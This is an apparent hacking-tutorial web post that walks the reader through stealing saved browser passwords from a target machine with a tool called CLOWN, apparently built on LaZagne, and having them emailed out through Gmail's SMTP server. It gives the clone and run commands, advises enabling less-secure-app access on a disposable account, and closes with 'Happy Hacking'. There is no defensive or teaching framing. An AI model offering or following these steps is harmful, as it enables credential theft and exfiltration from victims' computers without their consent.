How to Steal Passwords with Kali Linux and Have Them Sent to Your Email

Sep 4, 2019 05:19 PM
Sep 7, 2019 08:58 PM
637031862428213643.jpg

First you will need:

  • Kali Linux
  • Python 2.7 or Python 3 (Whichever works)
  • Root privileges
  • Access to an email address where the extracted passwords will be sent.

By invoking the LaZagne projects, this tool helps you steal stored browser passwords.

Step 1: Grant Access to Less Secure Apps on Your Email

The tool we are about to use will need access to your email since it uses google's SMTP server and for that reason granting access to less secure apps is necessary.

I strongly advise that you use a disposable email account. Click here to grant access to less secure apps. Also, this will not work if you have two step verification on.

Step 2: Download Clown

Fire up your Kali Linux terminal and clone into Inffinite's repository.

git clone github.com/Inffinite/CLOWN

637031879406963788.jpg

Step 3: Execute Clown

Assuming that you already have python installed and have root privileges on the target machine, you can execute the python file in the CLOWN folder.

cd CLOWN

ls

637031882970870022.jpg

Now run the python file.

sudo python CLOWN.py

637031885350401270.jpg

You will be prompted to enter your email address and its password right after.

Once the script runs you will immediately get an email with the all the stolen passwords.

637031890809932428.jpg

Happy Hacking ;)

Comments

No Comments Exist

Be the first, drop a comment!